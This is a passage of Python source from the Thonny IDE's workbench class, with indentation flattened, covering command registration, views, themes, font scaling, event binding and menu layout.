default_sequence: Default shortcut (Tk style)
flag_name: Used for toggle commands. Indicates the name of the boolean option.
group: Used for grouping related commands together. Value should be int.
Groups with smaller numbers appear before.
Returns:
None
"""
# Temporary solution for plug-ins made for versions before 3.2
if menu_name == "device":
menu_name = "tools"
group = 150
# store command to be published later
self._commands.append(
dict(
command_id=command_id,
menu_name=menu_name,
command_label=command_label,
handler=handler,
tester=tester,
default_sequence=default_sequence,
extra_sequences=extra_sequences,
flag_name=flag_name,
skip_sequence_binding=skip_sequence_binding,
accelerator=accelerator,
group=group,
position_in_group=position_in_group,
image=image,
caption=caption,
alternative_caption=alternative_caption,
include_in_menu=include_in_menu,
include_in_toolbar=include_in_toolbar,
submenu=submenu,
bell_when_denied=bell_when_denied,
show_extra_sequences=show_extra_sequences,
)
)
def _publish_commands(self) -> None:
for cmd in self._commands:
self._publish_command(**cmd)
def _publish_command(
self,
command_id: str,
menu_name: str,
command_label: str,
handler: Optional[Callable[[], None]],
tester: Optional[Callable[[], bool]] = None,
default_sequence: Optional[str] = None,
extra_sequences: Sequence[str] = [],
flag_name: Optional[str] = None,
skip_sequence_binding: bool = False,
accelerator: Optional[str] = None,
group: int = 99,
position_in_group="end",
image: Optional[str] = None,
caption: Optional[str] = None,
alternative_caption: Optional[str] = None,
include_in_menu: bool = True,
include_in_toolbar: bool = False,
submenu: Optional[tk.Menu] = None,
bell_when_denied: bool = True,
show_extra_sequences: bool = False,
) -> None:
def dispatch(event=None):
if not tester or tester():
denied = False
handler()
else:
denied = True
logging.debug("Command '" + command_id + "' execution denied")
if bell_when_denied:
self.bell()
self.event_generate("UICommandDispatched", command_id=command_id, denied=denied)
sequence_option_name = "shortcuts." + command_id
self.set_default(sequence_option_name, default_sequence)
sequence = self.get_option(sequence_option_name)
if sequence:
if not skip_sequence_binding:
self.bind_all(sequence, dispatch, True)
# register shortcut even without binding
register_latin_shortcut(self._latin_shortcuts, sequence, handler, tester)
for extra_sequence in extra_sequences:
self.bind_all(extra_sequence, dispatch, True)
if "greek_" not in extra_sequence.lower() or running_on_linux():
# Use greek alternatives only on Linux
# (they are not required on Mac
# and cause double events on Windows)
register_latin_shortcut(self._latin_shortcuts, sequence, handler, tester)
menu = self.get_menu(menu_name)
if image:
_image = self.get_image(image) # type: Optional[tk.PhotoImage]
else:
_image = None
if not accelerator and sequence:
accelerator = sequence_to_accelerator(sequence)
"""
# Does not work on Mac
if show_extra_sequences:
for extra_seq in extra_sequences:
accelerator += " or " + sequence_to_accelerator(extra_seq)
"""
if include_in_menu:
def dispatch_from_menu():
# I don't like that Tk menu toggles the checkbutton variable
# automatically before calling the handler.
# So I revert the toggle before calling the actual handler.
# This way the handler doesn't have to worry whether it
# needs to toggle the variable or not, and it can choose to
# decline the toggle.
if flag_name is not None:
var = self.get_variable(flag_name)
var.set(not var.get())
dispatch(None)
if _image and lookup_style_option("OPTIONS", "icons_in_menus", True):
menu_image = _image # type: Optional[tk.PhotoImage]
elif flag_name:
# no image or blank placeholder next to a checkbutton
menu_image = None
else:
menu_image = self.get_image("16x16-blank")
# remember the details that can't be stored in Tkinter objects
self._menu_item_specs[(menu_name, command_label)] = MenuItem(
group, position_in_group, tester
)
menu.insert(
self._find_location_for_menu_item(menu_name, command_label),
"checkbutton" if flag_name else "cascade" if submenu else "command",
label=command_label,
accelerator=accelerator,
image=menu_image,
compound=tk.LEFT,
variable=self.get_variable(flag_name) if flag_name else None,
command=dispatch_from_menu if handler else None,
menu=submenu,
)
if include_in_toolbar:
toolbar_group = self._get_menu_index(menu) * 100 + group
assert caption is not None
self._add_toolbar_button(
command_id,
_image,
command_label,
caption,
caption if alternative_caption is None else alternative_caption,
accelerator,
handler,
tester,
toolbar_group,
)
def add_view(
self,
cls: Type[tk.Widget],
label: str,
default_location: str,
visible_by_default: bool = False,
default_position_key: Optional[str] = None,
) -> None:
"""Adds item to "View" menu for showing/hiding given view.
Args:
cls: Class or constructor for the view. Should be callable with a single
argument (the master of the view)
label: Label of the view tab
default_location: Location descriptor. Can be "nw", "w", "sw", "s", "se", "e", "ne"
Returns: None
"""
view_id = cls.__name__
if default_position_key == None:
default_position_key = label
self.set_default("view." + view_id + ".visible", visible_by_default)
self.set_default("view." + view_id + ".location", default_location)
self.set_default("view." + view_id + ".position_key", default_position_key)
if self.in_simple_mode():
visibility_flag = tk.BooleanVar(value=view_id in SIMPLE_MODE_VIEWS)
else:
visibility_flag = cast(tk.BooleanVar, self.get_variable("view." + view_id + ".visible"))
self._view_records[view_id] = {
"class": cls,
"label": label,
"location": self.get_option("view." + view_id + ".location"),
"position_key": self.get_option("view." + view_id + ".position_key"),
"visibility_flag": visibility_flag,
}
# handler
def toggle_view_visibility():
if visibility_flag.get():
self.hide_view(view_id)
else:
self.show_view(view_id, True)
self.add_command(
"toggle_" + view_id,
menu_name="view",
command_label=label,
handler=toggle_view_visibility,
flag_name="view." + view_id + ".visible",
group=10,
position_in_group="alphabetic",
)
def add_configuration_page(
self, key: str, title: str, page_class: Type[tk.Widget], order: int
) -> None:
self._configuration_pages.append((key, title, page_class, order))
def add_content_inspector(self, inspector_class: Type) -> None:
self.content_inspector_classes.append(inspector_class)
def add_backend(
self,
name: str,
proxy_class: Type[BackendProxy],
description: str,
config_page_constructor,
sort_key=None,
) -> None:
self._backends[name] = BackendSpec(
name,
proxy_class,
description,
config_page_constructor,
sort_key if sort_key is not None else description,
)
# assign names to related classes
proxy_class.backend_name = name # type: ignore
if not isinstance(config_page_constructor, str):
if not getattr(config_page_constructor, "backend_name", None):
config_page_constructor.backend_name = name
def add_ui_theme(
self,
name: str,
parent: Union[str, None],
settings: FlexibleUiThemeSettings,
images: Dict[str, str] = {},
) -> None:
if name in self._ui_themes:
warn(_("Overwriting theme '%s'") % name)
self._ui_themes[name] = (parent, settings, images)
def add_syntax_theme(
self, name: str, parent: Optional[str], settings: FlexibleSyntaxThemeSettings
) -> None:
if name in self._syntax_themes:
warn(_("Overwriting theme '%s'") % name)
self._syntax_themes[name] = (parent, settings)
def get_usable_ui_theme_names(self) -> Sequence[str]:
return sorted([name for name in self._ui_themes if self._ui_themes[name][0] is not None])
def get_syntax_theme_names(self) -> Sequence[str]:
return sorted(self._syntax_themes.keys())
def get_ui_mode(self) -> str:
return self._active_ui_mode
def in_simple_mode(self) -> bool:
return self.get_ui_mode() == "simple"
def scale(self, value: Union[int, float]) -> int:
if isinstance(value, (int, float)):
# using int instead of round so that thin lines will stay
# one pixel even with scaling_factor 1.67
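# e.g. scale(1) with scaling_factor 1.67 gives int(1.67) == 1, whereas round() would give 2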
result = int(self._scaling_factor * value)
if result == 0 and value > 0:
# don't lose thin lines because of scaling
return 1
else:
return result
else:
raise NotImplementedError("Only numeric dimensions supported at the moment")
def _register_ui_theme_as_tk_theme(self, name: str) -> None:
# collect settings from all ancestors
total_settings = [] # type: List[FlexibleUiThemeSettings]
total_images = {} # type: Dict[str, str]
temp_name = name
while True:
parent, settings, images = self._ui_themes[temp_name]
total_settings.insert(0, settings)
for img_name in images:
total_images.setdefault(img_name, images[img_name])
if parent is not None:
temp_name = parent
else:
# reached start of the chain
break
assert temp_name in self._style.theme_names()
# only root of the ancestors is relevant for theme_create,
# because the method actually doesn't take parent settings into account
# (https://mail.python.org/pipermail/tkinter-discuss/2015-August/003752.html)
self._style.theme_create(name, temp_name)
self._image_mapping_by_theme[name] = total_images
# load images
self.get_image("tab-close", "img_close")
self.get_image("tab-close-active", "img_close_active")
# apply settings starting from root ancestor
for settings in total_settings:
if callable(settings):
settings = settings()
if isinstance(settings, dict):
self._style.theme_settings(name, settings)
else:
for subsettings in settings:
self._style.theme_settings(name, subsettings)
def _apply_ui_theme(self, name: str) -> None:
self._current_theme_name = name
if name not in self._style.theme_names():
self._register_ui_theme_as_tk_theme(name)
self._style.theme_use(name)
# https://wiki.tcl.tk/37973#pagetocfe8b22ab
for setting in ["background", "foreground", "selectBackground", "selectForeground"]:
value = self._style.lookup("Listbox", setting)
if value:
self.option_add("*TCombobox*Listbox." + setting, value)
self.option_add("*Listbox." + setting, value)
text_opts = self._style.configure("Text")
if text_opts:
for key in text_opts:
self.option_add("*Text." + key, text_opts[key])
if hasattr(self, "_menus"):
# if menus have been initialized, ie. when theme is being changed
for menu in self._menus.values():
menu.configure(get_style_configuration("Menu"))
self.update_fonts()
def _apply_syntax_theme(self, name: str) -> None:
def get_settings(name):
try:
parent, settings = self._syntax_themes[name]
except KeyError:
self.report_exception("Can't find theme '%s'" % name)
return {}
if callable(settings):
settings = settings()
if parent is None:
return settings
else:
result = get_settings(parent)
for key in settings:
if key in result:
result[key].update(settings[key])
else:
result[key] = settings[key]
return result
from thonny import codeview
codeview.set_syntax_options(get_settings(name))
def reload_themes(self) -> None:
preferred_theme = self.get_option("view.ui_theme")
available_themes = self.get_usable_ui_theme_names()
if preferred_theme in available_themes:
self._apply_ui_theme(preferred_theme)
elif "Enhanced Clam" in available_themes:
self._apply_ui_theme("Enhanced Clam")
elif "Windows" in available_themes:
self._apply_ui_theme("Windows")
self._apply_syntax_theme(self.get_option("view.syntax_theme"))
def uses_dark_ui_theme(self) -> bool:
name = self._style.theme_use()
while True:
if "dark" in name.lower():
return True
name, _, _ = self._ui_themes[name]
if name is None:
# reached start of the chain
break
return False
def _init_program_arguments_frame(self) -> None:
self.set_default("view.show_program_arguments", False)
self.set_default("run.program_arguments", "")
self.set_default("run.past_program_arguments", [])
visibility_var = self.get_variable("view.show_program_arguments")
content_var = self.get_variable("run.program_arguments")
frame = ttk.Frame(self._toolbar)
col = 1000
self._toolbar.columnconfigure(col, weight=1)
label = ttk.Label(frame, text=_("Program arguments:"))
label.grid(row=0, column=0, sticky="nse", padx=5)
self.program_arguments_box = ttk.Combobox(
frame,
width=80,
height=15,
textvariable=content_var,
values=[""] + self.get_option("run.past_program_arguments"),
)
self.program_arguments_box.grid(row=0, column=1, sticky="nsew", padx=5)
frame.columnconfigure(1, weight=1)
def update_visibility():
if visibility_var.get():
if not frame.winfo_ismapped():
frame.grid(row=0, column=col, sticky="nse")
else:
if frame.winfo_ismapped():
frame.grid_remove()
def toggle():
visibility_var.set(not visibility_var.get())
update_visibility()
self.add_command(
"viewargs",
"view",
_("Program arguments"),
toggle,
flag_name="view.show_program_arguments",
group=11,
)
update_visibility()
def _init_regular_mode_link(self):
if self.get_ui_mode() != "simple":
return
label = ttk.Label(
self._toolbar,
text=_("Switch to\nregular\nmode"),
justify="right",
font="SmallLinkFont",
style="Url.TLabel",
cursor="hand2",
)
label.grid(row=0, column=1001, sticky="ne")
def on_click(event):
self.set_option("general.ui_mode", "regular")
tk.messagebox.showinfo(
_("Regular mode"),
_(
"Configuration has been updated. "
+ "Restart Thonny to start working in regular mode.\n\n"
+ "(See 'Tools → Options → General' if you change your mind later.)"
),
parent=self,
)
label.bind("<1>", on_click, True)
def log_program_arguments_string(self, arg_str: str) -> None:
arg_str = arg_str.strip()
self.set_option("run.program_arguments", arg_str)
if arg_str == "":
# empty will be handled differently
return
past_args = self.get_option("run.past_program_arguments")
if arg_str in past_args:
past_args.remove(arg_str)
past_args.insert(0, arg_str)
past_args = past_args[:10]
self.set_option("run.past_program_arguments", past_args)
self.program_arguments_box.configure(values=[""] + past_args)
def _show_views(self) -> None:
for view_id in self._view_records:
if self._view_records[view_id]["visibility_flag"].get():
try:
self.show_view(view_id, False)
except Exception:
self.report_exception("Problem showing " + view_id)
def update_image_mapping(self, mapping: Dict[str, str]) -> None:
"""Was used by thonny-pi. Not recommended anymore"""
self._default_image_mapping.update(mapping)
def get_backends(self) -> Dict[str, BackendSpec]:
return self._backends
def get_option(self, name: str, default=None) -> Any:
# Need to return Any, otherwise each typed call site needs to cast
return self._configuration_manager.get_option(name, default)
def set_option(self, name: str, value: Any) -> None:
self._configuration_manager.set_option(name, value)
def get_local_cwd(self) -> str:
cwd = self.get_option("run.working_directory")
if os.path.exists(cwd):
return normpath_with_actual_case(cwd)
else:
return normpath_with_actual_case(os.path.expanduser("~"))
def set_local_cwd(self, value: str) -> None:
if self.get_option("run.working_directory") != value:
self.set_option("run.working_directory", value)
if value:
self.event_generate("LocalWorkingDirectoryChanged", cwd=value)
def set_default(self, name: str, default_value: Any) -> None:
"""Registers a new option.
If the name contains a period, then the part left to the (first) period
will become the section of the option and rest will become name under that
section.
If the name doesn't contain a period, then it will be added under section
"general".
"""
self._configuration_manager.set_default(name, default_value)
def get_variable(self, name: str) -> tk.Variable:
return self._configuration_manager.get_variable(name)
def get_menu(self, name: str, label: Optional[str] = None) -> tk.Menu:
"""Gives the menu with given name. Creates if not created yet.
Args:
name: meant to be used as not translatable menu name
label: translated label, used only when menu with given name doesn't exist yet
"""
if name not in self._menus:
menu = tk.Menu(self._menubar, **get_style_configuration("Menu"))
menu["postcommand"] = lambda: self._update_menu(menu, name)
self._menubar.add_cascade(label=label if label else name, menu=menu)
self._menus[name] = menu
if label:
self._menus[label] = menu
return self._menus[name]
def get_view(self, view_id: str, create: bool = True) -> tk.Widget:
if "instance" not in self._view_records[view_id]:
if not create:
raise RuntimeError("View %s not created" % view_id)
class_ = self._view_records[view_id]["class"]
location = self._view_records[view_id]["location"]
master = self._view_notebooks[location]
# create the view
view = class_(self) # View's master is workbench to allow making it maximized
view.position_key = self._view_records[view_id]["position_key"]
self._view_records[view_id]["instance"] = view
# create the view home_widget to be added into notebook
view.home_widget = ttk.Frame(master)
view.home_widget.columnconfigure(0, weight=1)
view.home_widget.rowconfigure(0, weight=1)
view.home_widget.maximizable_widget = view # type: ignore
view.home_widget.close = lambda: self.hide_view(view_id) # type: ignore
if hasattr(view, "position_key"):
view.home_widget.position_key = view.position_key # type: ignore
# initially the view will be in its home_widget
view.grid(row=0, column=0, sticky=tk.NSEW, in_=view.home_widget)
view.hidden = True
return self._view_records[view_id]["instance"]
def get_editor_notebook(self) -> EditorNotebook:
assert self._editor_notebook is not None
return self._editor_notebook
def get_package_dir(self):
"""Returns thonny package directory"""
return os.path.dirname(sys.modules["thonny"].__file__)
def get_image(self, filename: str, tk_name: Optional[str] = None) -> tk.PhotoImage:
if filename in self._image_mapping_by_theme[self._current_theme_name]:
filename = self._image_mapping_by_theme[self._current_theme_name][filename]
if filename in self._default_image_mapping:
filename = self._default_image_mapping[filename]
# if path is relative then interpret it as living in res folder
if not os.path.isabs(filename):
filename = os.path.join(self.get_package_dir(), "res", filename)
if not os.path.exists(filename):
if os.path.exists(filename + ".png"):
filename = filename + ".png"
elif os.path.exists(filename + ".gif"):
filename = filename + ".gif"
# are there platform-specific variants?
plat_filename = filename[:-4] + "_" + platform.system() + ".png"
if os.path.exists(plat_filename):
filename = plat_filename
if self._scaling_factor >= 2.0:
scaled_filename = filename[:-4] + "_2x.png"
if os.path.exists(scaled_filename):
filename = scaled_filename
else:
img = tk.PhotoImage(file=filename)
# can't use zoom method, because this doesn't allow name
img2 = tk.PhotoImage(tk_name)
self.tk.call(
img2,
"copy",
img.name,
"-zoom",
int(self._scaling_factor),
int(self._scaling_factor),
)
self._images.add(img2)
return img2
img = tk.PhotoImage(tk_name, file=filename)
self._images.add(img)
return img
def show_view(self, view_id: str, set_focus: bool = True) -> Union[bool, tk.Widget]:
"""View must be already registered.
Args:
view_id: View class name
without package name (eg. 'ShellView') """
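# e.g. self.show_view("ShellView"), as used by _cmd_focus_shell below, brings the
# Shell tab to the front of its notebook and returns the view instance.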
if view_id == "MainFileBrowser":
# Was renamed in 3.1.1
view_id = "FilesView"
# NB! Don't forget that view.home_widget is added to notebook, not view directly
# get or create
view = self.get_view(view_id)
notebook = view.home_widget.master # type: ignore
if hasattr(view, "before_show") and view.before_show() == False: # type: ignore
return False
if view.hidden: # type: ignore
notebook.insert(
"auto",
view.home_widget, # type: ignore
text=self._view_records[view_id]["label"],
)
view.hidden = False # type: ignore
if hasattr(view, "on_show"): # type: ignore
view.on_show()
# switch to the tab
notebook.select(view.home_widget) # type: ignore
# add focus
if set_focus:
view.focus_set()
self.set_option("view." + view_id + ".visible", True)
self.event_generate("ShowView", view=view, view_id=view_id)
return view
def hide_view(self, view_id: str) -> Union[bool, None]:
# NB! Don't forget that view.home_widget is added to notebook, not view directly
if "instance" in self._view_records[view_id]:
# TODO: handle the case, when view is maximized
view = self._view_records[view_id]["instance"]
if view.hidden:
return
if hasattr(view, "before_hide") and view.before_hide() == False:
return False
view.home_widget.master.forget(view.home_widget)
self.set_option("view." + view_id + ".visible", False)
self.event_generate("HideView", view=view, view_id=view_id)
view.hidden = True
return None
def event_generate(self, sequence: str, event: Optional[Record] = None, **kwargs) -> None:
"""Uses custom event handling when sequence doesn't start with <.
In this case arbitrary attributes can be added to the event.
Otherwise forwards the call to Tk's event_generate"""
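# e.g. the event_generate("ShowView", view=view, view_id=view_id) call in show_view
# above wraps its keyword arguments into a WorkbenchEvent and passes it to every
# handler registered via bind("ShowView", ...).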
# pylint: disable=arguments-differ
if sequence.startswith("<"):
assert event is None
tk.Tk.event_generate(self, sequence, **kwargs)
else:
if sequence in self._event_handlers:
if event is None:
event = WorkbenchEvent(sequence, **kwargs)
else:
event.update(kwargs)
# make a copy of handlers, so that event handler can remove itself
# from the registry during iteration
# (or new handlers can be added)
for handler in sorted(self._event_handlers[sequence].copy(), key=str):
try:
handler(event)
except Exception:
self.report_exception("Problem when handling '" + sequence + "'")
if not self._closing:
self._update_toolbar()
def bind(self, sequence: str, func: Callable, add: bool = None) -> None: # type: ignore
"""Uses custom event handling when sequence doesn't start with <.
Otherwise forwards the call to Tk's bind"""
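# Illustrative subscription to a workbench-level event (the handler name is hypothetical):
#
#   get_workbench().bind("ShowView", on_show_view, True)
#
# add=True appends the handler; a falsy add replaces all existing handlers for the event.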
# pylint: disable=signature-differs
if not add:
logging.warning(
"Workbench.bind({}, ..., add={}) -- did you really want to replace existing bindings?".format(
sequence, add
)
)
if sequence.startswith("<"):
tk.Tk.bind(self, sequence, func, add)
else:
if sequence not in self._event_handlers or not add:
self._event_handlers[sequence] = set()
self._event_handlers[sequence].add(func)
def unbind(self, sequence: str, func=None) -> None:
if sequence.startswith("<"):
tk.Tk.unbind(self, sequence, funcid=func)
else:
try:
self._event_handlers[sequence].remove(func)
except Exception:
logging.getLogger("thonny").exception(
"Can't remove binding for '%s' and '%s'", sequence, func
)
def in_heap_mode(self) -> bool:
# TODO: add a separate command for enabling the heap mode
# untie the mode from HeapView
return self._configuration_manager.has_option("view.HeapView.visible") and self.get_option(
"view.HeapView.visible"
)
def in_debug_mode(self) -> bool:
return os.environ.get("THONNY_DEBUG", False) in [
"1",
1,
"True",
True,
"true",
] or self.get_option("general.debug_mode", False)
def _init_scaling(self) -> None:
self._default_scaling_factor = self.tk.call("tk", "scaling")
if self._default_scaling_factor > 10:
# it may be infinity in eg. Fedora
self._default_scaling_factor = 1.33
scaling = self.get_option("general.scaling")
if scaling in ["default", "auto"]: # auto was used in 2.2b3
self._scaling_factor = self._default_scaling_factor
else:
self._scaling_factor = float(scaling)
MAC_SCALING_MODIFIER = 1.7
if running_on_mac_os():
self._scaling_factor *= MAC_SCALING_MODIFIER
self.tk.call("tk", "scaling", self._scaling_factor)
font_scaling_mode = self.get_option("general.font_scaling_mode")
if (
running_on_linux()
and font_scaling_mode in ["default", "extra"]
and scaling not in ["default", "auto"]
):
# update system fonts which are given in pixel sizes
for name in tk_font.names():
f = tk_font.nametofont(name)
orig_size = f.cget("size")
# According to the documentation, absolute values of negative font sizes
# should be interpreted as pixel sizes (not affected by "tk scaling")
# and positive values are point sizes, which are supposed to scale automatically
# http://www.tcl.tk/man/tcl8.6/TkCmd/font.htm#M26
# Unfortunately it seems that this cannot be relied on
# https://groups.google.com/forum/#!msg/comp.lang.tcl/ZpL6tq77M4M/GXImiV2INRQJ
# My experiments show that manually changing negative font sizes
# doesn't have any effect -- fonts keep their default size
# (Tested in Raspbian Stretch, Ubuntu 18.04 and Fedora 29)
# On the other hand positive sizes scale well (and they don't scale automatically)
# convert pixel sizes to point_size
if orig_size < 0:
orig_size = -orig_size / self._default_scaling_factor
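# (e.g. a -16 px system font with the 1.33 fallback factor becomes about 12 pt here)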
# scale
scaled_size = round(
orig_size * (self._scaling_factor / self._default_scaling_factor)
)
f.configure(size=scaled_size)
elif running_on_mac_os() and scaling not in ["default", "auto"]:
# see http://wiki.tcl.tk/44444
# update system fonts
for name in tk_font.names():
f = tk_font.nametofont(name)
orig_size = f.cget("size")
assert orig_size > 0
f.configure(size=int(orig_size * self._scaling_factor / MAC_SCALING_MODIFIER))
def update_fonts(self) -> None:
editor_font_size = self._guard_font_size(self.get_option("view.editor_font_size"))
editor_font_family = self.get_option("view.editor_font_family")
io_font_size = self._guard_font_size(self.get_option("view.io_font_size"))
io_font_family = self.get_option("view.io_font_family")
for io_name in [
"IOFont",
"BoldIOFont",
"UnderlineIOFont",
"ItalicIOFont",
"BoldItalicIOFont",
]:
tk_font.nametofont(io_name).configure(family=io_font_family, size=io_font_size)
tk_font.nametofont("EditorFont").configure(family=editor_font_family, size=editor_font_size)
tk_font.nametofont("SmallEditorFont").configure(
family=editor_font_family, size=editor_font_size - 2
)
tk_font.nametofont("BoldEditorFont").configure(
family=editor_font_family, size=editor_font_size
)
tk_font.nametofont("ItalicEditorFont").configure(
family=editor_font_family, size=editor_font_size
)
tk_font.nametofont("BoldItalicEditorFont").configure(
family=editor_font_family, size=editor_font_size
)
if self.get_ui_mode() == "simple":
default_size_factor = max(0.7, 1 - (editor_font_size - 10) / 25)
small_size_factor = max(0.6, 0.8 - (editor_font_size - 10) / 25)
tk_font.nametofont("TkDefaultFont").configure(
size=round(editor_font_size * default_size_factor)
)
tk_font.nametofont("TkHeadingFont").configure(
size=round(editor_font_size * default_size_factor)
)
tk_font.nametofont("SmallLinkFont").configure(
size=round(editor_font_size * small_size_factor)
)
style = ttk.Style()
if running_on_mac_os():
treeview_font_size = int(editor_font_size * 0.7 + 4)
rowheight = int(treeview_font_size * 1.2 + self.scale(4))
else:
treeview_font_size = int(editor_font_size * 0.7 + 2)
rowheight = int(treeview_font_size * 2.0 + self.scale(3))
tk_font.nametofont("TreeviewFont").configure(size=treeview_font_size)
style.configure("Treeview", rowheight=rowheight)
if self._editor_notebook is not None:
self._editor_notebook.update_appearance()
def _get_menu_index(self, menu: tk.Menu) -> int:
for i in range(len(self._menubar.winfo_children())):
if menu == self._menubar.winfo_children()[i]:
return i
raise RuntimeError("Couldn't find menu")
def _add_toolbar_button(
self,
command_id: str,
image: Optional[tk.PhotoImage],
command_label: str,
caption: str,
alternative_caption: str,
accelerator: Optional[str],
handler: Callable[[], None],
tester: Optional[Callable[[], bool]],
toolbar_group: int,
) -> None:
assert caption is not None and len(caption) > 0, (
"Missing caption for '%s'. Toolbar commands must have caption." % command_label
)
slaves = self._toolbar.grid_slaves(0, toolbar_group)
if len(slaves) == 0:
group_frame = ttk.Frame(self._toolbar)
if self.in_simple_mode():
padx = 0 # type: Union[int, Tuple[int, int]]
else:
padx = (0, 10)
group_frame.grid(row=0, column=toolbar_group, padx=padx)
else:
group_frame = slaves[0]
if self.in_simple_mode():
screen_width = self.winfo_screenwidth()
if screen_width >= 1280:
button_width = max(7, len(caption), len(alternative_caption))
elif screen_width >= 1024:
button_width = max(6, len(caption), len(alternative_caption))
else:
button_width = max(5, len(caption), len(alternative_caption))
else:
button_width = None
button = ttk.Button(
group_frame,
command=handler,
image=image,
style="Toolbutton",
state=tk.NORMAL,
text=caption,
compound="top" if self.in_simple_mode() else None,
pad=(10, 0) if self.in_simple_mode() else None,
width=button_width,
)
button.pack(side=tk.LEFT)
button.tester = tester # type: ignore
tooltip_text = command_label
if self.get_ui_mode() != "simple":
if accelerator and lookup_style_option(
"OPTIONS", "shortcuts_in_tooltips", default=True
):
tooltip_text += " (" + accelerator + ")"
create_tooltip(button, tooltip_text)
self._toolbar_buttons[command_id] = button
def get_toolbar_button(self, command_id):
return self._toolbar_buttons[command_id]
def _update_toolbar(self) -> None:
if self._destroyed or not hasattr(self, "_toolbar"):
return
if self._toolbar.winfo_ismapped():
for group_frame in self._toolbar.grid_slaves(0):
for button in group_frame.pack_slaves():
if thonny._runner is None or button.tester and not button.tester():
button["state"] = tk.DISABLED
else:
button["state"] = tk.NORMAL
def _cmd_zoom_with_mouse(self, event) -> None:
if event.delta > 0:
self._change_font_size(1)
else:
self._change_font_size(-1)
def _toggle_font_size(self) -> None:
current_size = self.get_option("view.editor_font_size")
if self.winfo_screenwidth() < 1024:
# assuming 32x32 icons
small_size = 10
medium_size = 12
large_size = 14
elif self.winfo_screenwidth() < 1280:
# assuming 32x32 icons
small_size = 12
medium_size = 14
large_size = 18
else:
small_size = 12
medium_size = 16
large_size = 20
widths = {10: 800, 12: 1050, 14: 1200, 16: 1300, 18: 1400, 20: 1650}
if current_size < small_size or current_size >= large_size:
new_size = small_size
elif current_size < medium_size:
new_size = medium_size
else:
new_size = large_size
self._change_font_size(new_size - current_size)
new_width = min(widths[new_size], self.winfo_screenwidth())
geo = re.findall(r"\d+", self.wm_geometry())
self.geometry("{0}x{1}+{2}+{3}".format(new_width, geo[1], geo[2], geo[3]))
def _change_font_size(self, delta: int) -> None:
if delta != 0:
editor_font_size = self.get_option("view.editor_font_size")
editor_font_size += delta
self.set_option("view.editor_font_size", self._guard_font_size(editor_font_size))
io_font_size = self.get_option("view.io_font_size")
io_font_size += delta
self.set_option("view.io_font_size", self._guard_font_size(io_font_size))
self.update_fonts()
def _guard_font_size(self, size: int) -> int:
# https://bitbucket.org/plas/thonny/issues/164/negative-font-size-crashes-thonny
MIN_SIZE = 4
MAX_SIZE = 200
if size < MIN_SIZE:
return MIN_SIZE
elif size > MAX_SIZE:
return MAX_SIZE
else:
return size
def _check_update_window_width(self, delta: int) -> None:
if not ui_utils.get_zoomed(self):
self.update_idletasks()
# TODO: shift to left if right edge goes away from screen
# TODO: check with screen width
new_geometry = "{0}x{1}+{2}+{3}".format(
self.winfo_width() + delta, self.winfo_height(), self.winfo_x(), self.winfo_y()
)
self.geometry(new_geometry)
def _maximize_view(self, event=None) -> None:
if self._maximized_view is not None:
return
# find the widget that can be relocated
widget = self.focus_get()
if isinstance(widget, (EditorNotebook, AutomaticNotebook)):
current_tab = widget.get_current_child()
if current_tab is None:
return
if not hasattr(current_tab, "maximizable_widget"):
return
widget = current_tab.maximizable_widget
while widget is not None:
if hasattr(widget, "home_widget"):
# if widget is view, then widget.master is workbench
widget.grid(
row=1, column=0, sticky=tk.NSEW, in_=widget.master # type: ignore
)
# hide main_frame
self._main_frame.grid_forget()
self._maximized_view = widget
self.get_variable("view.maximize_view").set(True)
break
else:
widget = widget.master # type: ignore
def _unmaximize_view(self, event=None) -> None:
if self._maximized_view is None:
return
# restore main_frame
self._main_frame.grid(row=1, column=0, sticky=tk.NSEW, in_=self)
# put the maximized view back to its home_widget
self._maximized_view.grid(
row=0, column=0, sticky=tk.NSEW, in_=self._maximized_view.home_widget # type: ignore
)
self._maximized_view = None
self.get_variable("view.maximize_view").set(False)
def show_options(self, page_key=None):
dlg = ConfigurationDialog(self, self._configuration_pages)
if page_key:
dlg.select_page(page_key)
ui_utils.show_dialog(dlg)
def _cmd_focus_editor(self) -> None:
self.get_editor_notebook().focus_set()
def _cmd_focus_shell(self) -> None:
self.show_view("ShellView", True)
shell = get_shell()
# go to the end of any current input
shell.text.mark_set("insert", "end")
shell.text.see("insert")
def _cmd_toggle_full_screen(self) -> None:
"""
TODO: For mac
http://wiki.tcl.tk/44444
Switching a window to fullscreen mode
(Normal Difference)
To switch a window to fullscreen mode, the window must first be withdrawn.
# For Linux/Mac OS X:
set cfs [wm attributes $w -fullscreen]
if { $::tcl_platform(os) eq "Darwin" } {
if { $cfs == 0 } {
# optional: save the window geometry
set savevar [wm geometry $w]
}
wm withdraw $w
}
wm attributes $w -fullscreen [expr {1-$cfs}]
if { $::tcl_platform(os) eq "Darwin" } {
wm deiconify $w
if { $cfs == 1 } {
after idle [list wm geometry $w $savevar]
}
}
"""
var = self.get_variable("view.full_screen")
var.set(not var.get())
self.attributes("-fullscreen", var.get())
def _cmd_toggle_maximize_view(self) -> None:
if self._maximized_view is not None:
self._unmaximize_view()
else:
self._maximize_view()
def _update_menu(self, menu: tk.Menu, menu_name: str) -> None:
if menu.index("end") is None:
return
for i in range(menu.index("end") + 1):
item_data = menu.entryconfigure(i)
if "label" in item_data:
command_label = menu.entrycget(i, "label")
if (menu_name, command_label) not in self._menu_item_specs:
continue
tester = self._menu_item_specs[(menu_name, command_label)].tester
if tester and not tester():
menu.entryconfigure(i, state=tk.DISABLED)
else:
menu.entryconfigure(i, state=tk.NORMAL)
def _find_location_for_menu_item(self, menu_name: str, command_label: str) -> Union[str, int]:
menu = self.get_menu(menu_name)
if menu.index("end") == None: # menu is empty
return "end"
specs = self._menu_item_specs[(menu_name, command_label)]
this_group_exists = False
for i in range(0, menu.index("end") + 1):
data = menu.entryconfigure(i)
if "label" in data:
# it's a command, not separator
sibling_label = menu.entrycget(i, "label")
sibling_group = self._menu_item_specs[(menu_name, sibling_label)].group
if sibling_group == specs.group:
this_group_exists = True
if specs.position_in_group == "alphabetic" and sibling_label > command_label:
return i
if sibling_group > specs.group:
assert (
not this_group_exists
) # otherwise we would have found the ending separator
menu.insert_separator(i)
return i
else:
# We found a separator
if this_group_exists:
# it must be the ending separator for this group
return i
# no group was bigger, ie. this should go to the end
if not this_group_exists:
menu.add_separator()
return "end"
def _handle_socket_request(self, client_socket: socket.socket) -> None:
"""runs in separate thread"""
# read the request
data = bytes()
while True:
new_data = client_socket.recv(1024)
if len(new_data) > 0:
data += new_data
else:
break
self._requests_from_socket.put(data)
# respond OK
client_socket.sendall(SERVER_SUCCESS.encode(encoding="utf-8"))
client_socket.shutdown(socket.SHUT_WR)
